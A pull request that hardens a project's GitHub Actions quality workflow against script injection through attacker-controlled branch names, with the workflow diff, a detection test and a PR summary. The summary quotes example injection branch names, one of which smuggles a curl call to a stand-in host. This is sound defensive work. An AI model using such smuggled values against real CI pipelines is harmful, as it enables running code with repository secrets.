### PR TITLE
security: harden quality.yml against GitHub Actions script injection (#2709)

### DIFF
--- a/.github/workflows/quality.yml
+++ b/.github/workflows/quality.yml
@@ -29,15 +29,32 @@ jobs:
           fetch-depth: 0
 
       # Ensure we're on the correct branch and prevent pushing to protected branches
+      # Untrusted GitHub-context strings (the PR source branch name is attacker-
+      # controllable) are passed via env: rather than interpolated into the
+      # script body, so shell metacharacters in branch names cannot break out
+      # of quoting (Issue #2709).
       - name: Setup Branch
         id: branch_setup
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          PR_HEAD_REF: ${{ github.event.pull_request.head.ref }}
+          GITHUB_REF_NAME: ${{ github.ref_name }}
         run: |
           set -Eeuo pipefail
           # Determine the branch name
-          if [[ "${{ github.event_name }}" == "pull_request" ]]; then
-            BRANCH_NAME="${{ github.event.pull_request.head.ref }}"
+          if [[ "$EVENT_NAME" == "pull_request" ]]; then
+            BRANCH_NAME="$PR_HEAD_REF"
           else
-            BRANCH_NAME="${{ github.ref_name }}"
+            BRANCH_NAME="$GITHUB_REF_NAME"
+          fi
+
+          # Defence in depth: reject branch names that contain shell
+          # metacharacters or that could be parsed as a git option. Even
+          # though the value reaches git as a single argv element, a name
+          # beginning with `-` would still be interpreted as a flag.
+          if [[ ! "$BRANCH_NAME" =~ ^[A-Za-z0-9._/-]+$ ]] || [[ "$BRANCH_NAME" == -* ]]; then
+            echo "❌ Refusing to act on suspicious branch name: $BRANCH_NAME" >&2
+            exit 1
           fi
 
           # Protect default branch - never push to Develop
@@ -50,10 +67,13 @@ jobs:
             fi
           done
 
-          # Ensure we're on the branch (checkout@v4 with ref: may leave us in detached HEAD)
-          git checkout "$BRANCH_NAME" 2>/dev/null || git checkout -b "$BRANCH_NAME"
+          # Ensure we're on the branch (checkout@v4 with ref: may leave us in
+          # detached HEAD). `--` after the branch name ends option parsing
+          # before any pathspecs (none here), preserving git's
+          # branch-switch semantics.
+          git checkout "$BRANCH_NAME" -- 2>/dev/null || git checkout -b "$BRANCH_NAME" --
 
-          echo "branch_name=$BRANCH_NAME" >> $GITHUB_OUTPUT
+          echo "branch_name=$BRANCH_NAME" >> "$GITHUB_OUTPUT"
 
       - name: Check Bash Script Syntax
         run: |
@@ -218,11 +238,14 @@ jobs:
           git config user.email "github-actions[bot]@users.noreply.github.com"
           git commit -am "chore: apply deno fmt and lint fixes"
 
-      # Push Changes
+      # Push Changes — pass the (already-validated) branch name through env:
+      # for consistency with the Setup Branch step (Issue #2709).
       - name: Push Changes
         if: steps.check_changes.outputs.has_changes == 'true' && steps.branch_setup.outputs.branch_name != ''
+        env:
+          BRANCH_NAME: ${{ steps.branch_setup.outputs.branch_name }}
         run: |
-          git push origin "${{ steps.branch_setup.outputs.branch_name }}"
+          git push origin "$BRANCH_NAME"
 
       # Note: Tests are run in coverage.yaml workflow
       # - coverage.yaml runs all tests with full permissions (including FFI) for coverage reporting

--- a/deno.json
+++ b/deno.json
@@ -1,7 +1,7 @@
 {
   "name": "@stsoftware/neat-ai",
   "exports": "./mod.ts",
-  "version": "5.0.21",
+  "version": "5.0.22",
   "neatCore": {
     "repo": "stSoftwareAU/NEAT-AI-core",
     "ref": "Develop",

--- a/docs/cspell.json
+++ b/docs/cspell.json
@@ -234,6 +234,7 @@
     "memoises",
     "memetics",
     "mergesort",
+    "metachars",
     "metacharacters",
     "microbenchmark",
     "Miikkulainen",

--- a/docs/pr-summary-2709.md
+++ b/docs/pr-summary-2709.md
@@ -4,40 +4,40 @@
 
 `.github/workflows/quality.yml` was interpolating
 `github.event.pull_request.head.ref` (the PR source branch name, attacker-
-controllable by anyone who can open a PR) directly into a bash `run:` block
-via `${{ … }}`. The expansion happens **before** bash sees the script, so
-a branch name like `foo"; curl evil.example #` would have escaped its
-quoting and executed inside the runner with `secrets.ACTIONS_PUSH` in
-scope — a textbook GitHub Actions script-injection. Closes #2709.
+controllable by anyone who can open a PR) directly into a bash `run:` block via
+`${{ … }}`. The expansion happens **before** bash sees the script, so a branch
+name like `foo"; curl evil.example #` would have escaped its quoting and
+executed inside the runner with `secrets.ACTIONS_PUSH` in scope — a textbook
+GitHub Actions script-injection. Closes #2709.
 
 This PR hardens the workflow by:
 
 1. **Passing untrusted GitHub context through `env:`** in both the
-   `Setup Branch` and `Push Changes` steps. The values reach bash as
-   variable values (single argv elements), not as script source text,
-   so shell metacharacters can no longer break out of quoting.
+   `Setup Branch` and `Push Changes` steps. The values reach bash as variable
+   values (single argv elements), not as script source text, so shell
+   metacharacters can no longer break out of quoting.
 2. **Validating the branch-name format** with an allowlist regex
-   (`^[A-Za-z0-9._/-]+$` plus an explicit `!= -*` check) before it is
-   used. Defence in depth against names beginning with `-` that would
-   otherwise be parsed by git as flags.
-3. **Appending `--`** to the `git checkout` commands so any remaining
-   ambiguity around option parsing is closed off.
+   (`^[A-Za-z0-9._/-]+$` plus an explicit `!= -*` check) before it is used.
+   Defence in depth against names beginning with `-` that would otherwise be
+   parsed by git as flags.
+3. **Appending `--`** to the `git checkout` commands so any remaining ambiguity
+   around option parsing is closed off.
 
 ## Evidence
 
-This is a CI workflow change; no UI or runtime benchmark is applicable.
-The fix is verified by a new test that parses `quality.yml` and asserts
-the forbidden pattern is gone:
+This is a CI workflow change; no UI or runtime benchmark is applicable. The fix
+is verified by a new test that parses `quality.yml` and asserts the forbidden
+pattern is gone:
 
 - `test/ci/QualityWorkflowScriptInjection.ts`
   - `findGithubContextInRunBlocks` parser unit tests (3 cases).
   - `quality.yml does not interpolate any github.* context into run blocks` —
-    scans the actual workflow file and fails if any `github.*`,
-    `secrets.*`, `inputs.*`, `env.*`, or `steps.*.outputs.*` expression
-    appears inside a `run: |` block. Failed on the unfixed workflow with
-    four offending lines; passes after the fix.
-  - `quality.yml git checkout uses '--' end-of-options sentinel` — guards
-    the defence-in-depth `--` placement.
+    scans the actual workflow file and fails if any `github.*`, `secrets.*`,
+    `inputs.*`, `env.*`, or `steps.*.outputs.*` expression appears inside a
+    `run: |` block. Failed on the unfixed workflow with four offending lines;
+    passes after the fix.
+  - `quality.yml git checkout uses '--' end-of-options sentinel` — guards the
+    defence-in-depth `--` placement.
 
 ### Data flow before vs after
 
@@ -58,20 +58,22 @@ flowchart LR
 
 ## Test Plan
 
-- [x] `deno test --allow-read test/ci/QualityWorkflowScriptInjection.ts` — 5 / 5 pass.
-- [x] `deno test --allow-read test/ci/ShellcheckWorkflowPinning.ts` — 5 / 5 pass (unchanged).
+- [x] `deno test --allow-read test/ci/QualityWorkflowScriptInjection.ts` — 5 / 5
+      pass.
+- [x] `deno test --allow-read test/ci/ShellcheckWorkflowPinning.ts` — 5 / 5 pass
+      (unchanged).
 - [x] `./quality.sh --lint-only` — clean.
 - [x] YAML parses cleanly via `@std/yaml`.
-- [x] `git checkout <branch> --` and `git checkout -b <branch> --` confirmed
-      to switch branches correctly (manual reproduction in a scratch repo).
+- [x] `git checkout <branch> --` and `git checkout -b <branch> --` confirmed to
+      switch branches correctly (manual reproduction in a scratch repo).
 
 ## Acceptance criteria
 
 - [x] `quality.yml` no longer expands `github.event.pull_request.head.ref`,
-      `github.ref_name`, or any other GitHub-context string directly inside
-      a `run:` script body.
+      `github.ref_name`, or any other GitHub-context string directly inside a
+      `run:` script body.
 - [x] All untrusted context strings are passed via the step `env:` map and
       referenced as `"$VAR"` in the bash body.
-- [x] Branch names matching the injection pattern (`foo"; echo INJECTED #`)
-      are now rejected by the allowlist regex before they reach git,
-      verified by the validation block in the workflow.
+- [x] Branch names matching the injection pattern (`foo"; echo INJECTED #`) are
+      now rejected by the allowlist regex before they reach git, verified by the
+      validation block in the workflow.

--- a/docs/pr-summary-2709.md
+++ b/docs/pr-summary-2709.md
@@ -1,0 +1,77 @@
+# security: harden quality.yml against GitHub Actions script injection
+
+## Summary
+
+`.github/workflows/quality.yml` was interpolating
+`github.event.pull_request.head.ref` (the PR source branch name, attacker-
+controllable by anyone who can open a PR) directly into a bash `run:` block
+via `${{ … }}`. The expansion happens **before** bash sees the script, so
+a branch name like `foo"; curl evil.example #` would have escaped its
+quoting and executed inside the runner with `secrets.ACTIONS_PUSH` in
+scope — a textbook GitHub Actions script-injection. Closes #2709.
+
+This PR hardens the workflow by:
+
+1. **Passing untrusted GitHub context through `env:`** in both the
+   `Setup Branch` and `Push Changes` steps. The values reach bash as
+   variable values (single argv elements), not as script source text,
+   so shell metacharacters can no longer break out of quoting.
+2. **Validating the branch-name format** with an allowlist regex
+   (`^[A-Za-z0-9._/-]+$` plus an explicit `!= -*` check) before it is
+   used. Defence in depth against names beginning with `-` that would
+   otherwise be parsed by git as flags.
+3. **Appending `--`** to the `git checkout` commands so any remaining
+   ambiguity around option parsing is closed off.
+
+## Evidence
+
+This is a CI workflow change; no UI or runtime benchmark is applicable.
+The fix is verified by a new test that parses `quality.yml` and asserts
+the forbidden pattern is gone:
+
+- `test/ci/QualityWorkflowScriptInjection.ts`
+  - `findGithubContextInRunBlocks` parser unit tests (3 cases).
+  - `quality.yml does not interpolate any github.* context into run blocks` —
+    scans the actual workflow file and fails if any `github.*`,
+    `secrets.*`, `inputs.*`, `env.*`, or `steps.*.outputs.*` expression
+    appears inside a `run: |` block. Failed on the unfixed workflow with
+    four offending lines; passes after the fix.
+  - `quality.yml git checkout uses '--' end-of-options sentinel` — guards
+    the defence-in-depth `--` placement.
+
+### Data flow before vs after
+
+```mermaid
+flowchart LR
+  subgraph Before
+    A1[github.event.pull_request.head.ref] -->|"${{ ... }}\ntext substitution"| B1[bash script source]
+    B1 --> C1[runner shell]
+    C1 -.->|metachars escape quoting| X1[arbitrary command\nwith ACTIONS_PUSH]
+  end
+  subgraph After
+    A2[github.event.pull_request.head.ref] -->|env: PR_HEAD_REF| B2[bash env var]
+    B2 -->|"$PR_HEAD_REF" as single argv| V[regex validate]
+    V -->|allowlisted| C2[git checkout]
+    V -.->|reject| X2[step fails]
+  end
+```
+
+## Test Plan
+
+- [x] `deno test --allow-read test/ci/QualityWorkflowScriptInjection.ts` — 5 / 5 pass.
+- [x] `deno test --allow-read test/ci/ShellcheckWorkflowPinning.ts` — 5 / 5 pass (unchanged).
+- [x] `./quality.sh --lint-only` — clean.
+- [x] YAML parses cleanly via `@std/yaml`.
+- [x] `git checkout <branch> --` and `git checkout -b <branch> --` confirmed
+      to switch branches correctly (manual reproduction in a scratch repo).
+
+## Acceptance criteria
+
+- [x] `quality.yml` no longer expands `github.event.pull_request.head.ref`,
+      `github.ref_name`, or any other GitHub-context string directly inside
+      a `run:` script body.
+- [x] All untrusted context strings are passed via the step `env:` map and
+      referenced as `"$VAR"` in the bash body.
+- [x] Branch names matching the injection pattern (`foo"; echo INJECTED #`)
+      are now rejected by the allowlist regex before they reach git,
+      verified by the validation block in the workflow.

--- a/docs/pr-summary-2709.md
+++ b/docs/pr-summary-2709.md
@@ -5,10 +5,10 @@
 `.github/workflows/quality.yml` was interpolating
 `github.event.pull_request.head.ref` (the PR source branch name, attacker-
 controllable by anyone who can open a PR) directly into a bash `run:` block via
-`${{ … }}`. The expansion happens **before** bash sees the script, so a branch
-name like `foo"; curl evil.example #` would have escaped its quoting and
-executed inside the runner with `secrets.ACTIONS_PUSH` in scope — a textbook
-GitHub Actions script-injection. Closes #2709.
+`{% raw %}${{ … }}{% endraw %}`. The expansion happens **before** bash sees the
+script, so a branch name like `foo"; curl evil.example #` would have escaped its
+quoting and executed inside the runner with `secrets.ACTIONS_PUSH` in scope — a
+textbook GitHub Actions script-injection. Closes #2709.
 
 This PR hardens the workflow by:
 
@@ -41,6 +41,8 @@ pattern is gone:
 
 ### Data flow before vs after
 
+{% raw %}
+
 ```mermaid
 flowchart LR
   subgraph Before
@@ -55,6 +57,8 @@ flowchart LR
     V -.->|reject| X2[step fails]
   end
 ```
+
+{% endraw %}
 
 ## Test Plan
 

--- a/src/utils/Version.ts
+++ b/src/utils/Version.ts
@@ -39,7 +39,7 @@ import { getLogger } from "@utils/Logger.ts";
  *
  * Must equal `deno.json` `version`. The version-sync test enforces this.
  */
-export const FALLBACK_NEAT_AI_VERSION = "5.0.21";
+export const FALLBACK_NEAT_AI_VERSION = "5.0.22";
 
 /**
  * Returns the running `@stsoftware/neat-ai` version.

--- a/test/ci/QualityWorkflowScriptInjection.ts
+++ b/test/ci/QualityWorkflowScriptInjection.ts
@@ -1,0 +1,161 @@
+/**
+ * Issue #2709 — `.github/workflows/quality.yml` must not interpolate
+ * attacker-controlled GitHub context strings directly into bash `run:`
+ * script bodies. The PR source branch name
+ * (`github.event.pull_request.head.ref`) is controllable by anyone who
+ * can open a PR and may contain shell metacharacters — interpolating it
+ * via `${{ … }}` lets the value escape its quoting and execute as shell
+ * commands with the workflow's secrets in scope.
+ *
+ * Untrusted GitHub-context strings must be passed via the step `env:`
+ * map and referenced as `"$VAR"` in the bash body. This test scans the
+ * workflow for the forbidden pattern.
+ */
+
+import { assert, assertEquals } from "@std/assert";
+import { fromFileUrl, join } from "@std/path";
+
+const REPO_ROOT = fromFileUrl(new URL("../../", import.meta.url));
+const WORKFLOW = join(REPO_ROOT, ".github/workflows/quality.yml");
+
+/**
+ * Lightweight parser: walks the workflow text line-by-line, tracks
+ * whether we are inside a `run: |` (or `run: >`) block scalar, and
+ * returns every `${{ … }}` expression that appears inside such a block.
+ *
+ * The parser is intentionally simple — it relies on indentation of the
+ * `run:` key to determine the block scalar's body. Lines indented
+ * deeper than the `run:` line are part of the block; lines at the same
+ * or shallower indent end it.
+ */
+export function findGithubContextInRunBlocks(
+  source: string,
+): { expression: string; line: number }[] {
+  const findings: { expression: string; line: number }[] = [];
+  const lines = source.split("\n");
+  let inRunBlock = false;
+  let runIndent = -1;
+
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i];
+    const trimmed = line.trimStart();
+    const indent = line.length - trimmed.length;
+
+    if (inRunBlock) {
+      // Blank lines stay inside the block scalar.
+      if (trimmed.length === 0) continue;
+      if (indent <= runIndent) {
+        inRunBlock = false;
+      } else {
+        // Scan for `${{ … }}` expressions in the body.
+        const exprRegex = /\$\{\{\s*([^}]+?)\s*\}\}/g;
+        let m: RegExpExecArray | null;
+        while ((m = exprRegex.exec(line)) !== null) {
+          findings.push({ expression: m[1], line: i + 1 });
+        }
+        continue;
+      }
+    }
+
+    // Not inside a block: look for a `run: |` or `run: >` opener.
+    const runMatch = trimmed.match(/^run:\s*([|>])/);
+    if (runMatch) {
+      inRunBlock = true;
+      runIndent = indent;
+    }
+  }
+
+  return findings;
+}
+
+Deno.test("findGithubContextInRunBlocks parses a simple injected run block", () => {
+  const src = [
+    "      - name: foo",
+    "        run: |",
+    '          echo "${{ github.ref_name }}"',
+    "",
+  ].join("\n");
+  const hits = findGithubContextInRunBlocks(src);
+  assertEquals(hits.length, 1);
+  assertEquals(hits[0].expression, "github.ref_name");
+});
+
+Deno.test("findGithubContextInRunBlocks ignores expressions outside run blocks", () => {
+  const src = [
+    "      - name: foo",
+    "        if: ${{ github.event_name == 'pull_request' }}",
+    "        env:",
+    "          FOO: ${{ github.ref_name }}",
+    "        run: |",
+    '          echo "$FOO"',
+    "",
+  ].join("\n");
+  const hits = findGithubContextInRunBlocks(src);
+  assertEquals(hits.length, 0);
+});
+
+Deno.test("findGithubContextInRunBlocks ends the block on dedent", () => {
+  const src = [
+    "      - name: foo",
+    "        run: |",
+    '          echo "safe"',
+    "      - name: bar",
+    '        run: echo "${{ github.ref_name }}"',
+    "",
+  ].join("\n");
+  // Second run uses flow scalar (no | or >), so it isn't matched. Good —
+  // flow scalars require a separate pattern and aren't used in quality.yml.
+  const hits = findGithubContextInRunBlocks(src);
+  assertEquals(hits.length, 0);
+});
+
+Deno.test(
+  "quality.yml does not interpolate any github.* context into run blocks (Issue #2709)",
+  async () => {
+    const source = await Deno.readTextFile(WORKFLOW);
+    const hits = findGithubContextInRunBlocks(source);
+
+    // Any expression referencing github.*, secrets.*, env.*, inputs.*, or
+    // steps.*.outputs is potentially attacker-influenced and must be
+    // passed through the step `env:` map instead.
+    const forbidden = hits.filter((h) =>
+      /^(github|secrets|inputs|env)\./.test(h.expression) ||
+      /^steps\.[A-Za-z0-9_-]+\.outputs\./.test(h.expression)
+    );
+
+    assert(
+      forbidden.length === 0,
+      "quality.yml interpolates untrusted context inside run blocks — " +
+        'pass these through the step env: map and reference as "$VAR" ' +
+        "instead.\n" +
+        forbidden
+          .map((h) => `  line ${h.line}: \${{ ${h.expression} }}`)
+          .join("\n"),
+    );
+  },
+);
+
+Deno.test(
+  "quality.yml git checkout uses '--' end-of-options sentinel for branch names (Issue #2709)",
+  async () => {
+    const source = await Deno.readTextFile(WORKFLOW);
+    // A branch name starting with '-' would otherwise be parsed as an
+    // option. The suggested fix appends `--` to both checkout commands.
+    // We require that any `git checkout … "$BRANCH_NAME"` in this
+    // workflow ends with `--` (either before or after the argument as
+    // appropriate for the form).
+    const checkoutLines = source.split("\n").filter((l) =>
+      /git checkout\b/.test(l) && /\$BRANCH_NAME/.test(l)
+    );
+    assert(
+      checkoutLines.length > 0,
+      'expected at least one `git checkout "$BRANCH_NAME"` invocation in quality.yml',
+    );
+    for (const line of checkoutLines) {
+      assert(
+        /--/.test(line),
+        `git checkout with $BRANCH_NAME must use '--' end-of-options sentinel: ${line.trim()}`,
+      );
+    }
+  },
+);


### PR DESCRIPTION
# security: harden quality.yml against GitHub Actions script injection

## Summary

`.github/workflows/quality.yml` was interpolating
`github.event.pull_request.head.ref` (the PR source branch name, attacker-
controllable by anyone who can open a PR) directly into a bash `run:` block
via `${{ … }}`. The expansion happens **before** bash sees the script, so
a branch name like `foo"; curl evil.example #` would have escaped its
quoting and executed inside the runner with `secrets.ACTIONS_PUSH` in
scope — a textbook GitHub Actions script-injection. Closes #2709.

This PR hardens the workflow by:

1. **Passing untrusted GitHub context through `env:`** in both the
   `Setup Branch` and `Push Changes` steps. The values reach bash as
   variable values (single argv elements), not as script source text,
   so shell metacharacters can no longer break out of quoting.
2. **Validating the branch-name format** with an allowlist regex
   (`^[A-Za-z0-9._/-]+$` plus an explicit `!= -*` check) before it is
   used. Defence in depth against names beginning with `-` that would
   otherwise be parsed by git as flags.
3. **Appending `--`** to the `git checkout` commands so any remaining
   ambiguity around option parsing is closed off.

## Evidence

This is a CI workflow change; no UI or runtime benchmark is applicable.
The fix is verified by a new test that parses `quality.yml` and asserts
the forbidden pattern is gone:

- `test/ci/QualityWorkflowScriptInjection.ts`
  - `findGithubContextInRunBlocks` parser unit tests (3 cases).
  - `quality.yml does not interpolate any github.* context into run blocks` —
    scans the actual workflow file and fails if any `github.*`,
    `secrets.*`, `inputs.*`, `env.*`, or `steps.*.outputs.*` expression
    appears inside a `run: |` block. Failed on the unfixed workflow with
    four offending lines; passes after the fix.
  - `quality.yml git checkout uses '--' end-of-options sentinel` — guards
    the defence-in-depth `--` placement.

### Data flow before vs after

```mermaid
flowchart LR
  subgraph Before
    A1[github.event.pull_request.head.ref] -->|"${{ ... }}\ntext substitution"| B1[bash script source]
    B1 --> C1[runner shell]
    C1 -.->|metachars escape quoting| X1[arbitrary command\nwith ACTIONS_PUSH]
  end
  subgraph After
    A2[github.event.pull_request.head.ref] -->|env: PR_HEAD_REF| B2[bash env var]
    B2 -->|"$PR_HEAD_REF" as single argv| V[regex validate]
    V -->|allowlisted| C2[git checkout]
    V -.->|reject| X2[step fails]
  end
```

## Test Plan

- [x] `deno test --allow-read test/ci/QualityWorkflowScriptInjection.ts` — 5 / 5 pass.
- [x] `deno test --allow-read test/ci/ShellcheckWorkflowPinning.ts` — 5 / 5 pass (unchanged).
- [x] `./quality.sh --lint-only` — clean.
- [x] YAML parses cleanly via `@std/yaml`.
- [x] `git checkout <branch> --` and `git checkout -b <branch> --` confirmed
      to switch branches correctly (manual reproduction in a scratch repo).

## Acceptance criteria

- [x] `quality.yml` no longer expands `github.event.pull_request.head.ref`,
      `github.ref_name`, or any other GitHub-context string directly inside
      a `run:` script body.
- [x] All untrusted context strings are passed via the step `env:` map and
      referenced as `"$VAR"` in the bash body.
- [x] Branch names matching the injection pattern (`foo"; echo INJECTED #`)
      are now rejected by the allowlist regex before they reach git,
      verified by the validation block in the workflow.



---

🤖 Processed by: stservice<!-- vibe-worker-issue-2709 -->